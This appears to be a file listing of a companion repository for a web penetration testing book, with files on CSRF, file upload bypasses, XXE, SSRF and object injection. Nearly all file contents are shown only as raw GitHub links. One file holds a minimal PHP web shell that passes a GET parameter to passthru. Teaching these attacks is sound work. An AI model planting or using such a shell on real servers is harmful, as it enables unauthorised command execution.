├── Chapter 1
    ├── Page-2-Demonstration of the same-origin policy in Google Chrome.html
    └── Page-5-AJAX and the same-origin policy.html
├── Chapter 3
    └── DOM-based-Page-21.html
├── Chapter 4
    ├── Exploiting CSRF in JSON requests-Page-8.html
    ├── Exploiting CSRF in JSON requests-Page-9.html
    ├── Exploiting POST-request based CSRF-Page-4.html
    ├── Exploring pseudo anti-CSRF tokens-Page-11.html
    ├── Flash comes to the rescue-Page-13.html
    ├── Introducing CSRF-Page-2.html
    └── PayPal-CSRF-Page-7.html
├── Chapter 6
    ├── Page-11-SVG-Images.svg
    ├── Page-13-Case-sensitive blacklist extension check bypass.php
    ├── Page-15-MIME content type verification bypass.php
    ├── Page-17-Apache's htaccess trick to execute benign files as PHP.php
    ├── Page-18-SetHandler method.htaccess
    ├── Page-19-Bypassing image content verification.php
    ├── Page-2-Introducing-file-upload-vulnerability.php
    ├── Page-3-Remote-code-execution.php
    ├── Page-4-Remote-code-execution.jsp
    └── Page-9-SWF-the-flash.as
├── Chapter 8
    ├── Page-10-SSRF-through-XXE.xml
    ├── Page-13-Denial-of-Service-through-XXE.xml
    ├── Page-13-Remote code execution.xml
    ├── Page-15-XML-billions-Laughs.xml
    ├── Page-2-XML-101.xml
    ├── Page-3-Internal-DTD.xml
    ├── Page-3-XML-Attributes.xml
    ├── Page-4-External-DTD-student.dtd
    ├── Page-4-External-DTD.xml
    ├── Page-5-Entities.xml
    ├── Page-5-Entity-declaration-2.xml
    ├── Page-5-Entity-declaration.xml
    ├── Page-6-XXE-attack.php
    ├── Page-8-Reading-files.xml
    └── Page-9-PHP Base64 conversion URI as an alternative.xml
├── Chapter 9
    ├── Page-16-DOM-clobbering-2.html
    ├── Page-16-DOM-clobbering.html
    ├── Page-18-Relative-Path-Overwrite.css
    ├── Page-19-Relative-Path-Overwrite-2.html
    ├── Page-21-Controlling-CSS.html
    ├── Page-22-Internet-Explorer.html
    ├── Page-25-UI-redressing.html
    ├── Page-26-UI-redressing-2.html
    ├── Page-26-UI-redressing-3.html
    ├── Page-29-PHP-serialization.php
    ├── Page-3-Demonstrating-SSRF.php
    ├── Page-30-PHP-serialization.php
    └── Page-31-Object-Injection.php
├── LICENSE
└── README.md


/Chapter 1/Page-2-Demonstration of the same-origin policy in Google Chrome.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 1/Page-2-Demonstration of the same-origin policy in Google Chrome.html


--------------------------------------------------------------------------------
/Chapter 1/Page-5-AJAX and the same-origin policy.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 1/Page-5-AJAX and the same-origin policy.html


--------------------------------------------------------------------------------
/Chapter 3/DOM-based-Page-21.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 3/DOM-based-Page-21.html


--------------------------------------------------------------------------------
/Chapter 4/Exploiting CSRF in JSON requests-Page-8.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting CSRF in JSON requests-Page-8.html


--------------------------------------------------------------------------------
/Chapter 4/Exploiting CSRF in JSON requests-Page-9.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting CSRF in JSON requests-Page-9.html


--------------------------------------------------------------------------------
/Chapter 4/Exploiting POST-request based CSRF-Page-4.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting POST-request based CSRF-Page-4.html


--------------------------------------------------------------------------------
/Chapter 4/Exploring pseudo anti-CSRF tokens-Page-11.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploring pseudo anti-CSRF tokens-Page-11.html


--------------------------------------------------------------------------------
/Chapter 4/Flash comes to the rescue-Page-13.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Flash comes to the rescue-Page-13.html


--------------------------------------------------------------------------------
/Chapter 4/Introducing CSRF-Page-2.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Introducing CSRF-Page-2.html


--------------------------------------------------------------------------------
/Chapter 4/PayPal-CSRF-Page-7.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/PayPal-CSRF-Page-7.html


--------------------------------------------------------------------------------
/Chapter 6/Page-11-SVG-Images.svg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-11-SVG-Images.svg


--------------------------------------------------------------------------------
/Chapter 6/Page-13-Case-sensitive blacklist extension check bypass.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-13-Case-sensitive blacklist extension check bypass.php


--------------------------------------------------------------------------------
/Chapter 6/Page-15-MIME content type verification bypass.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-15-MIME content type verification bypass.php


--------------------------------------------------------------------------------
/Chapter 6/Page-17-Apache's htaccess trick to execute benign files as PHP.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-17-Apache's htaccess trick to execute benign files as PHP.php


--------------------------------------------------------------------------------
/Chapter 6/Page-18-SetHandler method.htaccess:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-18-SetHandler method.htaccess


--------------------------------------------------------------------------------
/Chapter 6/Page-19-Bypassing image content verification.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-19-Bypassing image content verification.php


--------------------------------------------------------------------------------
/Chapter 6/Page-2-Introducing-file-upload-vulnerability.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-2-Introducing-file-upload-vulnerability.php


--------------------------------------------------------------------------------
/Chapter 6/Page-3-Remote-code-execution.php:
--------------------------------------------------------------------------------
1 | <?php
2 | passthru($_GET['cmd']);
3 | ?>


--------------------------------------------------------------------------------
/Chapter 6/Page-4-Remote-code-execution.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-4-Remote-code-execution.jsp


--------------------------------------------------------------------------------
/Chapter 6/Page-9-SWF-the-flash.as:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-9-SWF-the-flash.as


--------------------------------------------------------------------------------
/Chapter 8/Page-10-SSRF-through-XXE.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-10-SSRF-through-XXE.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-13-Denial-of-Service-through-XXE.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-13-Denial-of-Service-through-XXE.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-13-Remote code execution.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-13-Remote code execution.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-15-XML-billions-Laughs.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-15-XML-billions-Laughs.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-2-XML-101.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-2-XML-101.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-3-Internal-DTD.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-3-Internal-DTD.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-3-XML-Attributes.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-3-XML-Attributes.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-4-External-DTD-student.dtd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-4-External-DTD-student.dtd


--------------------------------------------------------------------------------
/Chapter 8/Page-4-External-DTD.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-4-External-DTD.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-5-Entities.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entities.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-5-Entity-declaration-2.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entity-declaration-2.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-5-Entity-declaration.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entity-declaration.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-6-XXE-attack.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-6-XXE-attack.php


--------------------------------------------------------------------------------
/Chapter 8/Page-8-Reading-files.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-8-Reading-files.xml


--------------------------------------------------------------------------------
/Chapter 8/Page-9-PHP Base64 conversion URI as an alternative.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-9-PHP Base64 conversion URI as an alternative.xml


--------------------------------------------------------------------------------
/Chapter 9/Page-16-DOM-clobbering-2.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-16-DOM-clobbering-2.html


--------------------------------------------------------------------------------
/Chapter 9/Page-16-DOM-clobbering.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-16-DOM-clobbering.html


--------------------------------------------------------------------------------
/Chapter 9/Page-18-Relative-Path-Overwrite.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-18-Relative-Path-Overwrite.css


--------------------------------------------------------------------------------
/Chapter 9/Page-19-Relative-Path-Overwrite-2.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-19-Relative-Path-Overwrite-2.html


--------------------------------------------------------------------------------
/Chapter 9/Page-21-Controlling-CSS.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-21-Controlling-CSS.html


--------------------------------------------------------------------------------
/Chapter 9/Page-22-Internet-Explorer.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-22-Internet-Explorer.html


--------------------------------------------------------------------------------
/Chapter 9/Page-25-UI-redressing.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-25-UI-redressing.html


--------------------------------------------------------------------------------
/Chapter 9/Page-26-UI-redressing-2.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-26-UI-redressing-2.html


--------------------------------------------------------------------------------
/Chapter 9/Page-26-UI-redressing-3.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-26-UI-redressing-3.html


--------------------------------------------------------------------------------
/Chapter 9/Page-29-PHP-serialization.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-29-PHP-serialization.php


--------------------------------------------------------------------------------
/Chapter 9/Page-3-Demonstrating-SSRF.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-3-Demonstrating-SSRF.php


--------------------------------------------------------------------------------
/Chapter 9/Page-30-PHP-serialization.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-30-PHP-serialization.php


--------------------------------------------------------------------------------
/Chapter 9/Page-31-Object-Injection.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-31-Object-Injection.php


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/LICENSE


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/README.md


--------------------------------------------------------------------------------